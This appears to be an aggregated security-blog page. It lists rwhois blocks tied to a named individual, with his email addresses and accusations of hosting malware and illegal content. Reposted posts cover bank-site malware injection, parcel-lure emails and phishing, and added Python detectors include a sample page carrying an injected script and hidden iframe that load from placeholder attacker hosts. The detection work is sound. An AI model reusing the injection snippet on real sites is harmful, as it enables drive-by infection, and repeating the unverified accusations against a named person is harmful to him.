network:IP-Network-Block:174.36.195.192-174.36.195.223
network:Organization;I:Nikolai Lidiaev

Malware: 174.36.195.192 hobby-continent.ru PHP/BackDoor.AR
Other domains on 174.36.195.192 include warez, incest sites, and “children’s music” sites.
Reverse entry is sh14.ruskyhost.ru (at 174.36.194.154)

network:IP-Network-Block:174.36.214.32-174.36.214.63
network:Organization;I:Nikolai Lidiaev

network:IP-Network-Block:174.36.221.128-174.36.221.159
network:Organization;I:Nikolai Lidiaev

sh16.ruskyhost.ru ptr 174.36.221.128
(174.36.221.128 reverse entry is sh16.ruskyhost.ru)
Domains on 174.36.221.128 include ebay typosquatters, rape sites, underage sex sites, and illegal pharmacy sites.

network:IP-Network-Block:174.36.225.48-174.36.225.63
network:Organization;I:Nikolai Lidiaev

Malware: 174.36.225.48 drakarinfo.ru WORM/Koobface.ebk

network:IP-Network-Block:174.37.217.96-174.37.217.127
network:Organization;I:Nikolai Lidiaev

174.37.217.96 (illegal pharmacy, scam and porn sites)

network:IP-Network-Block:174.37.222.128-174.37.222.159
network:Organization;I:Nikolai Lidiaev

Malware: 174.37.222.128 shuchinsk.net unknown_html_RFI

network:IP-Network-Block:174.37.244.32-174.37.244.63
network:Organization;I:Nikolai Lidiaev

174.37.244.32 mail-sticker.ru phishing
Malware: 174.37.244.51 trashiugar.info ZEUS Trojan

Nikolai Lidiaev NET-67-228-53-176 (NET-67-228-53-176-1)
67.228.53.176 – 67.228.53.183
rusky host domains
67.228.53.176 ns1.slavhost.com name server for illegal pharmacy, malware, and pornography domains

network:IP-Network-Block:67.228.22.132-67.228.22.135
network:Organization;I:Nikolai Lidiaev

67.228.22.132 ns2.slavhost.com name server for malware domains
67.228.22.132 ns2.wpills.info name server for illegal pharmacy sites

network:IP-Network-Block:67.228.250.128-67.228.250.159
network:Organization;I:Nikolai Lidiaev


network:IP-Network-Block:67.228.77.0-67.228.77.7
network:Organization;I:FXOpen

Investor Forex Scams

network:IP-Network-Block:74.86.132.176-74.86.132.179
network:Organization;I:Nikolai Lidiaev

74.86.132.177 ns3.ruskyhost.net name server for malware and scam sites

Other email addresses used by Nikolai Lidiaev in the past few years include:
nick@slavhost.ru
nnnlen@comcast.net

James McQuaid
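The rwhois records quoted above are the raw material for a deny list, and the Received header of the spoofed message is where the originating address is recorded. As an added example, not part of James McQuaid's post, the following Python turns records in that "first-last" format into CIDR blocks, looks up which holder a given address belongs to, emits the blocks for one holder, and checks the address a receiving MTA logged. The record excerpt and the Received header below are constructed for the example (the hostname, address and holder names are the ones the post lists; mx.example.gov and the queue id are placeholders).

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Constructed excerpt in the rwhois record format quoted in the post above.
RWHOIS_RECORDS = """\
network:IP-Network-Block:174.36.194.152-174.36.194.159
network:Organization;I:Nikolai Lidiaev

network:IP-Network-Block:174.36.221.128-174.36.221.159
network:Organization;I:Nikolai Lidiaev

network:IP-Network-Block:67.228.77.0-67.228.77.7
network:Organization;I:FXOpen
"""

# Constructed Received header in the shape a receiving MTA would log for the
# message described above; the relay name and address are the ones in the post.
RECEIVED_HEADER = (
    "Received: from sh16.ruskyhost.ru (sh16.ruskyhost.ru [174.36.194.156])\n"
    "\tby mx.example.gov (Postfix) with ESMTP id 1A2B3C\n"
)

BLOCK_RE = re.compile(r"^network:IP-Network-Block:([\d.]+)-([\d.]+)$")
ORG_RE = re.compile(r"^network:Organization;I:(.+)$")
RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

Holder = Tuple[ipaddress.IPv4Network, str]


def parse_rwhois(text: str) -> List[Holder]:
    """Pair each first-last range with the Organization line that follows it,
    converting the range to one or more CIDR networks."""
    holders: List[Holder] = []
    pending = None  # (first, last) waiting for its Organization line
    for raw in text.splitlines():
        line = raw.strip()
        m = BLOCK_RE.match(line)
        if m:
            pending = (ipaddress.ip_address(m.group(1)), ipaddress.ip_address(m.group(2)))
            continue
        m = ORG_RE.match(line)
        if m and pending is not None:
            for net in ipaddress.summarize_address_range(*pending):
                holders.append((net, m.group(1).strip()))
            pending = None
    return holders


def holder_of(ip: str, holders: List[Holder]) -> Optional[str]:
    """Name of the organisation whose block contains ip, or None."""
    addr = ipaddress.ip_address(ip)
    for net, org in holders:
        if addr in net:
            return org
    return None


def blocklist_for(org: str, holders: List[Holder]) -> List[str]:
    """CIDR strings for one holder, ready for a firewall or mail-gateway deny list."""
    return sorted(str(net) for net, holder in holders if holder == org)


def originating_ip(received: str) -> Optional[str]:
    """Bracketed address the receiving MTA recorded in a Received header."""
    m = RECEIVED_IP_RE.search(received)
    return m.group(1) if m else None


def sender_holder(received: str, holders: List[Holder]) -> Optional[str]:
    """Holder of the block the logged sender address falls in, if any."""
    ip = originating_ip(received)
    return holder_of(ip, holders) if ip else None


if __name__ == "__main__":
    h = parse_rwhois(RWHOIS_RECORDS)
    print(blocklist_for("Nikolai Lidiaev", h))
    print(sender_holder(RECEIVED_HEADER, h))
```

Blocking on the holder's CIDR ranges rather than on individual hostnames is the point: the post shows the same operator reusing hosts across several blocks, and a new hostname inside an already-listed range costs him nothing.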



Posted in Security | Comments (1)

When Websites Attack

Wouldn’t it be crazy if a banking website infected our computer with a virus that steals money from our bank account? If you agree, then get ready for a big dose of crazy. Here’s the inside scoop on a banking website we discovered doing just that: infecting its customers’ computers with banking malware.
[Quick note: 60 Minutes ran a segment yesterday on infected websites. You can view the segment here. They interviewed a woman who watched her bank account get hacked before her very eyes.]
During a routine scan of banking, shopping and financial services websites, the virus lab here at Authentium discovered malicious code on the website of a credit union in Louisiana. The code, which would have been invisible to us humans, was inserted at the bottom of each web page on the site. Here are some Before and After shots of the site, showing the source code:
Before (screenshot of the page source)

After (screenshot of the page source, with the injected code at the bottom)
What does this code do?

Any Internet user who pointed their browser at the site would have the bad code downloaded and run inside their Internet Explorer or other web browser. The web browser would run this code just like all the other “good” code that shows us the text, images and links that make up the web page we’re viewing. The bad code is smart. It pulls down more code from various places, jumping from China to Ukraine and back to China. It’s pretty tough for the good guys to track down the bad guys with that kind of world-hopping behavior. Here’s a simple view:

During Step 3, the code tries to infect our computer, betting on the fact that our Windows software is not up to date like Microsoft warns here, or we have not updated our Adobe PDF viewer like Adobe warns here and here. In spite of these warnings from software vendors, an alarming percentage of computers remain out-of-date and vulnerable to infection.

The code in Step 3 is identified on http://www.virustotal.com/ as the (variously named) Zbot Trojan. The trojan installs a keylogger, steals sensitive data and enables fraudulent banking transactions. One thing to note in the following screenshot is that only some antivirus products detect the infection. If you were running Trend Micro or McAfee when you visited the site you would not have been protected.

http://www.virustotal.com/ analysis of the infection

So the upshot of the above is: simply browsing to the credit union website can get you infected with a trojan that steals your money.
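The scan the post describes is a before/after comparison of page source looking for code that a human viewing the page would never see. As an added example, not Authentium's scanner, the following Python flags the two usual forms of that injection: a script loaded from a host other than the site's own, and an iframe sized to zero or styled invisible, noting when either appears after the closing html tag, where appended injections land. The two pages, the site hostname and the attacker hostnames are constructed placeholders, not the credit union or the servers in the post.

```python
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

# Assumed hostname of the site being scanned (a placeholder, not the credit union).
SITE_HOST = "www.example-cu.org"

# Constructed "before" page: the site's own markup, with a same-origin script.
BEFORE_HTML = """<html><head><title>Example Credit Union</title></head>
<body><h1>Welcome</h1><script src="/js/site.js"></script>
<p>Online banking login</p></body></html>
"""

# Constructed "after" page: the same markup with an injected block appended past
# the closing tag, as the post describes. The hostnames are placeholders.
AFTER_HTML = BEFORE_HTML + (
    '<script src="http://bad.example.cn/in.php"></script>\n'
    '<iframe src="http://evil.example.ua/x.html" width="0" height="0"'
    ' style="visibility:hidden"></iframe>\n'
)

HIDDEN_STYLE_TOKENS = ("display:none", "visibility:hidden")


class InjectionScanner(HTMLParser):
    """Flags off-site scripts and invisible iframes, recording whether they
    appear after </html>, the spot where appended injections usually land."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host
        self.findings: List[str] = []
        self.past_html_close = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        where = "after </html>" if self.past_html_close else "inside document"
        if tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname  # None for relative URLs
            if host and host != self.site_host:
                self.findings.append(f"external script {a['src']} ({where})")
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or any(tok in style for tok in HIDDEN_STYLE_TOKENS):
                self.findings.append(f"hidden iframe {a.get('src', '?')} ({where})")

    def handle_endtag(self, tag):
        if tag == "html":
            self.past_html_close = True


def scan_page(html: str, site_host: str = SITE_HOST) -> List[str]:
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def new_findings(before: str, after: str, site_host: str = SITE_HOST) -> List[str]:
    """What a routine rescan reports that the baseline scan did not."""
    baseline = set(scan_page(before, site_host))
    return [f for f in scan_page(after, site_host) if f not in baseline]


if __name__ == "__main__":
    for finding in new_findings(BEFORE_HTML, AFTER_HTML):
        print(finding)
```

A real scanner would also fetch the page with a browser-like User-Agent and from several source networks, because injected loaders often serve different content to crawlers than to visitors.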

How did the code get there?

It’s likely that the company managing the website did not keep the operating system, database, web server or other software up-to-date, allowing criminals to gain administrative access to the server and insert the bad code. They need to make sure the servers are up-to-date with the latest patches from Microsoft and the other vendors, just like we need to do with our own computers.

Happy Ending?

The malicious code has been removed from the banking website we are profiling here. That doesn’t mean it won’t be back. Authentium continues to scan banking and shopping websites to make sure that users of our SafeCentral secure browsing service are as protected as possible. SafeCentral is designed to provide safe web transactions even if you’ve been unlucky enough to visit a website that has infected your computer.

Posted in Security | Comments Off

Are you contributing to the Twitter Denial of Service Attack?

Twitter has been dealing with a denial of service attack this morning that has resulted in millions of users not receiving or posting tweets.

These days denial of service attacks typically are launched from botnets–large numbers of consumer PCs that have been infected with Trojans that wait to do the bidding of the “bot-herders” who manage them. The users of these machines may not know anything is wrong other than, “Gee, the Internet seems slow today.” Their Internet is slow because their computer is sending lots of traffic to the targeted site, in this case twitter.com. The bot-herders collect infected machines and then rent them out. Twitter is such a high profile site, it may be just a bot-herder or one of their customers wanting to show off the power of their bot net.

Is your computer a member of one of these botnets? It’s not easy for the average Internet user to find out. Seeing rapidly blinking lights on your cable modem even if you aren’t using your computer may suggest something is going on. But it could just be an updater downloading a new Firefox or operating system patch.

You may not be too worried about the state of Twitter. But you should know that botnets can be told to do many things. They can be instructed, for example, to download keyloggers or other data-stealing malware. The stolen data is then shipped off to collection servers where the bad guys can then use your bank username and password to steal money.

Keep your antivirus up to date and perform a full scan if you’re a little concerned.

Download and use SafeCentral if you want to bank and shop without the worry. SafeCentral users talk about this stuff here: community.safecentral.com.

Update:

It may be coincidental, but we saw a large increase yesterday in our virus-collection network. We received 200 times the normal average of emails with malicious attachments. One node, for example, went from 10 items to 2000 in a day. These were phony emails telling random recipients that a UPS parcel could not be delivered and asking the reader to “print out the attached invoice”. The attachment was not an invoice, it was a trojan.

Example of the email. Do not open the attachments in these emails if you get one!

Posted in Security | Comments Off

Update: Researchers unsure why Adobe Reader X spoiled new PDF attack

Adobe’s Reader X, last year’s upgrade that features a “sandbox” designed to protect users from PDF exploits, stymied a recent attack campaign, researchers said.

Full story: Network World on Security

Posted in Security | Comments Off

Phishing Attack on PayPal Italy

We are monitoring a phishing attack directed toward the customers of PayPal Italy. The email is very long and explains to the reader why it is important to click on the link and answer the survey. As usual for this kind of email, the subject says that the user is required to take action immediately.

Another interesting fact about this phishing attack is that the email appears to be sent from paypal.lt (Lithuania). Checking the paypal.lt domain in a browser, we are redirected to the paypal.com website and then to the final target http://www-paypal-deutschland.de. These guys from PayPal seem never to learn anything from experience. As long as you have more than one domain for a business, you create confusion and practically invite fraudsters to take advantage of it.

The fake PayPal website looks different than the real paypal.it website (on paypal.it/ricarica), which might be because the screenshot was taken at a different point in time.

We would like to remind our readers never to click on links in (unexpected) emails. If you have to visit a web shop or the website of a financial institution, please make sure you type the URL by hand rather than clicking links in some email!

Sorin Mustaca
Data Security Expert

Full story: Avira – TechBlog

Posted in Antivirus | Comments Off


UK foreign secretary: “We’re under attack”

Yesterday, the UK foreign secretary, William Hague, explained to a security conference in Munich how cyber criminals were trying to infiltrate the UK government and defense contractors.

According to a BBC report, Mr. Hague explained that attackers had infected government computers with the Zeus trojan (Sophos calls Zeus “Zbot”) in attacks similar to those on the Department of Homeland Security last June.

While I commend the government for publicly addressing these issues, I certainly hope this isn’t news to those in the MoD (Ministry of Defence) or defense industries.

The types of threats Mr. Hague outlined are not just hitting the UK government. These types of malware, social engineering and targeted phishing are gaining momentum against businesses all over the planet.

Most of the examples he cited began as email attacks. While best practices suggest that you should block all executable content from entering your mail gateways, booby-trapped documents are still a risk.

Spend some time educating your users that Microsoft Office documents, PDFs and other commonly used file types can be dangerous. If you are not expecting a document, or if you find it out of context, don’t open it.

Phone the person who appears to have sent it or use some other out-of-band communications method to confirm the document isn’t phony.

For more information on how malicious PDF documents can be used to compromise your computers, check out “Finding rules for heuristic detection of malicious PDFs: With analysis of embedded exploit code”, the paper that Paul Baccas from SophosLabs presented at the Virus Bulletin 2010 conference.

Creative Commons photo of William Hague courtesy of Drown’s Flickr photostream.

Full story: Naked Security – Sophos

Posted in Sophos | Comments Off


Outbreak: United Parcel Service notification malware attack spammed out

Cybercriminals are attempting to infect computers around the world, disguising their attack as an email claiming to come from United Parcel Service about a parcel delivery.

But this time they’re not using words, they’re using an embedded image to trick you into clicking on the link.

Here’s what a typical malicious email being used in this malware campaign looks like:

United Parcel Service notification malicious email

Subject: United Parcel Service notification #<random number>

Attached file: USPS_Document.zip

Message body:
Dear customer.

The parcel was sent to your home address.
And it will arrive within 3 business days.

More information and the tracking number are attached in the document below.

Thank you.
United Parcel Service.

Copyright (c) 1994-2011 United Parcel Service of America, Inc. All rights reserved.

As you can see – it looks pretty professional. Which may well fool more people into believing it is genuine.

What’s interesting is that there is no actual text inside the email’s message body, instead it consists solely of an image – presumably with the intention of attempting to slip past the more rudimentary anti-spam filters.

Attached to the email is a file called USPS_Document.zip, which contains the malware attack. Sophos detects the ZIP file proactively as Mal/BredoZp-B and the enclosed file as the Troj/Agent-QGH Trojan horse.

The malware is only capable of infecting computers running Windows.

If you are one of the many people seeing this malware attack in your email this morning, please do not click on the attachment even if you are waiting for a package to be delivered. Instead, simply delete the email and your computer will be safe.

This latest attack follows hard on the heels of another widespread assault on users’ inboxes which began to strike earlier this week, posing as a message from Post Express Service.

Full story: Naked Security – Sophos

Posted in Sophos | Comments (2)

Publicly Disclosed GSM Attack Surface Expanding

During the course of 2009, the amount of publicly available information on the security of GSM cellular networks and devices has steadily increased. GSM stands for the “Global System for Mobile communications” and is the world’s most popular standard for mobile handsets.

View full post on SecureWorks Research Blog

Posted in Security | Comments Off


Outbreak: Post Express Service malware attack spammed out

Sophos — Be on your guard against the latest “undelivered package” malware attack that cybercriminals are spamming out right now.

Regular readers of Naked Security will be all too familiar with emails claiming to come from the likes of FedEx, UPS and DHL which pretend to be about a parcel that wasn’t delivered properly (and all you have to do is click on the attachment to “learn more”, which is to say, to become infected).

Now we’re seeing malicious emails which pretend to come from “Post Express Service”. Here’s a typical example:

Malicious email

Subject: Post Express Service. Get the parcel NR<random number>

Message body:
Dear client.

Your package has been returned to the Post Express office.
The reason of the return is "Error in the delivery address"

Attached to the letter mailing label contains the details of the package delivery.
You have to print mailing label, and come in the Post Express office in order to receive the packages.

Thank you.
Post Express Support

Attached file: Post_Express_Label_<random number>.zip

Other subject lines used in the attack include:

Post Express Service. Number of your parcel <random number>
Post Express Service. Package is available for pickup! NR<random number>
Post Express Service. Delivery refuse! NR<random number>

Hopefully you and the users inside your company won’t be so excited about the thought of an unexpected parcel that they open the attached file, as doing so will infect your Windows computer with malware.

Sophos detects the ZIP file as Troj/BredoZp-BT and the enclosed malware as Troj/Spyeye-R.

Remember, there’s only one reason why cybercriminals keep using this type of social engineering to fool users into running malware – it works.
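Both outbreaks above share the same shape: a templated subject with a random number, an image-only or near-empty body, a ZIP attachment with a predictable name, and a Windows executable inside the ZIP. As an added example, not Sophos code, the following Python builds a constructed message in that shape (the "executable" is a two-byte MZ stub, not malware) and scores it against those four signals, so a mail gateway can quarantine on the combination rather than on any single one. The sender address, recipient and number are placeholders; the subject and attachment patterns are the ones quoted in the two posts.

```python
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from typing import List

# Subject templates quoted in the two posts; <random number> becomes \d+.
SUBJECT_PATTERNS = [
    re.compile(r"^United Parcel Service notification #\d+"),
    re.compile(r"^Post Express Service\. (Get the parcel |Package is available for pickup! |Delivery refuse! )NR\d+"),
    re.compile(r"^Post Express Service\. Number of your parcel \d+"),
]
# Attachment names quoted in the posts.
ATTACHMENT_RE = re.compile(r"^(USPS_Document|Post_Express_Label_\d+)\.zip$", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs")


def build_sample_lure() -> bytes:
    """Constructed message in the shape the posts describe: lure subject,
    image-only HTML body, and a ZIP whose only member is a Windows executable.
    The member is a harmless MZ stub, not real malware."""
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, "w") as z:
        z.writestr("Post_Express_Label_4820.exe", b"MZ" + b"\x00" * 62)
    msg = EmailMessage()
    msg["From"] = "Post Express Support <support@post-express.example>"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Post Express Service. Get the parcel NR4820"
    msg.set_content('<html><body><img src="cid:lure"></body></html>', subtype="html")
    msg.add_attachment(zip_buf.getvalue(), maintype="application", subtype="zip",
                       filename="Post_Express_Label_4820.zip")
    return msg.as_bytes()


def build_benign_message() -> bytes:
    """Constructed ordinary message for contrast."""
    msg = EmailMessage()
    msg["From"] = "alice@example.org"
    msg["To"] = "bob@example.org"
    msg["Subject"] = "Lunch tomorrow?"
    msg.set_content("See you at noon.")
    return msg.as_bytes()


def indicators(raw: bytes) -> List[str]:
    """Independent signals; two or more together are treated as a lure."""
    msg = message_from_bytes(raw, policy=policy.default)
    hits: List[str] = []

    subject = str(msg["Subject"] or "")
    if any(p.search(subject) for p in SUBJECT_PATTERNS):
        hits.append("subject matches a parcel-lure template")

    body = msg.get_body(preferencelist=("html", "plain"))
    if body is not None:
        text = body.get_content()
        visible = re.sub(r"<[^>]+>", "", text).strip()
        if "<img" in text.lower() and not visible:
            hits.append("body is image-only")

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if ATTACHMENT_RE.match(name):
            hits.append(f"attachment name matches a lure: {name}")
        if name.lower().endswith(".zip"):
            try:
                with zipfile.ZipFile(io.BytesIO(part.get_content())) as z:
                    execs = [n for n in z.namelist() if n.lower().endswith(EXECUTABLE_EXT)]
            except zipfile.BadZipFile:
                execs = []
            if execs:
                hits.append("zip contains executable: " + ", ".join(execs))
    return hits


def is_parcel_lure(raw: bytes) -> bool:
    return len(indicators(raw)) >= 2


if __name__ == "__main__":
    for line in indicators(build_sample_lure()):
        print(line)
```

The ZIP inspection is the durable signal: subjects and file names change with every campaign, but an archive whose only member is an executable almost never arrives in legitimate mail, and the check costs one central-directory read, no extraction.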


If you got a suspicious email, you can forward it to us [malware@computersecurityarticles.info], or you can also submit the malicious file via “Virus Submit”.

Posted in Sophos | Comments (27)

Cartasi Italy under heavy phishing attack

We are currently observing an attack with different phishing emails and websites, targeting the customers of the Italian bank Cartasi.

We have spotted 4 different phishing attacks, 3 of them using the classical technique of faking the target URL (pictures 1-3) and one using social engineering techniques (Picture 4). The last one tempts the user to access his/her account in order to receive a 150 EUR fidelity bonus. To make the effect realistic, a sense of urgency is created by stating in the email that the account has to be accessed within 48 hours of receiving the email.

All emails we received are being sent from bots around the world, containing also some fake headers.

As usual, we would like to assure our readers that nothing is really free on the Internet and that banks (should) never send emails asking users to do something that could identify them. The emails are all detected by Avira Antispam as Phishing and all URLs are blocked.

Sorin Mustaca
Data Security Expert

Full story: Avira – TechBlog
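The two Italian phishing posts above describe the same two tricks: a link whose visible text is the bank's URL while the href points elsewhere ("faking the target URL"), and a brand name buried inside a hostname the brand does not own (the paypal.lt / www-paypal-deutschland.de confusion). As an added example, not Avira's detection logic, the following Python pulls the anchors out of an HTML email and flags both. The lure body is constructed, the attacker hostnames are placeholders, and the set of legitimate brand domains is an assumption for the example; the registered-domain helper is deliberately naive (last two labels) and a production version would use the Public Suffix List.

```python
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

# Assumed set of registered domains the targeted brands actually use.
LEGIT_DOMAINS: Set[str] = {"paypal.com", "paypal.it", "cartasi.it"}

# Constructed lure body mixing the two techniques described above: a visible URL
# that differs from the real href, and a brand name buried in an attacker hostname.
SAMPLE_EMAIL_HTML = """<p>Gentile cliente, il suo account deve essere verificato entro 48 ore.</p>
<p><a href="http://www.paypal.it.account-verify.example.net/ricarica">https://www.paypal.it/ricarica</a></p>
<p><a href="https://www.paypal.it/help">Centro assistenza</a></p>
<p><a href="http://cartasi-bonus.example.org/login">Ricevi il bonus di 150 EUR</a></p>
"""


def registered_domain(host: str) -> str:
    """Last two labels of a hostname. Good enough for the example; real code
    should consult the Public Suffix List (co.uk and friends)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every anchor in the message."""

    def __init__(self):
        super().__init__()
        self.links: List[Dict[str, str]] = []
        self._current: Optional[Dict[str, str]] = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href") or ""
            self._current = {"href": href, "text": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self._current["text"] = self._current["text"].strip()
            self.links.append(self._current)
            self._current = None


def analyze_links(html: str, legit: Set[str] = LEGIT_DOMAINS) -> List[Dict[str, object]]:
    """Return one finding per suspicious anchor, with the reasons it was flagged."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    brands = {d.split(".")[0] for d in legit}  # "paypal", "cartasi"
    findings: List[Dict[str, object]] = []
    for link in collector.links:
        host = urlparse(link["href"]).hostname or ""
        reasons: List[str] = []
        if registered_domain(host) not in legit:
            reasons.append("href host is not a known brand domain")
        text = link["text"]
        if text.lower().startswith(("http://", "https://")):
            shown = urlparse(text).hostname or ""
            if shown != host:
                reasons.append(f"visible URL host {shown} differs from href host {host}")
        if any(b in host for b in brands) and registered_domain(host) not in legit:
            reasons.append("brand name used inside a non-brand hostname")
        if reasons:
            findings.append({"href": link["href"], "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_links(SAMPLE_EMAIL_HTML):
        print(f["href"], "->", "; ".join(f["reasons"]))
```

The second link, a genuine paypal.it URL with plain link text, passes untouched; that matters, because a filter that flags every link mentioning the brand will be tuned off by the first helpdesk complaint.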

Posted in Antivirus | Comments Off

Inside a phishing attack: 35 credit cards in 5 hours

Phishing attacks have grown steadily in recent years, becoming a highly profitable attack for cyber criminals. In ESET Latin America’s Laboratory, we are used to finding and informing about phishing attack outbreaks in our region. A few days ago, we found a new case of phishing, for which we investigated the effectiveness of the attack.
In … Read More.

Full story: ESET ThreatBlog

Posted in Antivirus | Comments Off
